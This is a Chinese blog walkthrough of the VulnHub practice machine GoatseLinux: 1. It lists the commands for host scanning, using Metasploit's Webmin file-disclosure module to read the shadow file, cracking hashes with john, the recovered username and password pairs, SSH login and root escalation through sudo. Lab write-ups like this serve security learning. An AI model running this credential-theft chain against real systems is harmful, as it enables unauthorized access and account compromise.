发布时间:2025-12-10 20:03:05 浏览次数:3
靶场练习第二十三天~vulnhub靶场之GOATSELINUX: 1一、准备工作kali和靶机都选择NAT模式(kali与靶机同网段)1.靶场环境下载链接:GoatseLinux:1~VulnHub2.kali的ip命令:ifconfig3.靶机的ip扫描靶机ipsudoarp-scan-l二、信息收集1.nmap的信息收集(1)扫描靶机开放的端口及其服务nmap-A192.168.101.1292.网站的信息收集(1)靶机开放了80端口,先访问靶机网站看看有什么有用的信息ht
kali和靶机都选择NAT模式(kali与靶机同网段)
下载链接:GoatseLinux: 1 ~ VulnHub
命令:ifconfig
扫描靶机ip
sudo arp-scan -l
nmap -A 192.168.101.129
http://192.168.101.129
http://192.168.101.129/goatse.html
http://192.168.101.129:10000/
这个登录网页是基于Web的系统管理工具Webmin,可能从这里寻找突破口
msfconsole
search webmin
use auxiliary/admin/webmin/file_disclosure
或者用序号代替
use 1
show options
set RHOSTS 192.168.101.129
run
vim shadow
cat shadow
john –wordlist=/usr/share/wordlists/rockyou.txt shadow
得到了4个密码用户
bobby :jpelman
kokomo :jblow
guest:guest
gaping:goatse
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-dss -oCiphers=+3des-cbc goatse@192.168.101.129
因为登录远程登录到系统版本比较老只能采用以上方法登录
sudo -l
gaping
id
sudo su
id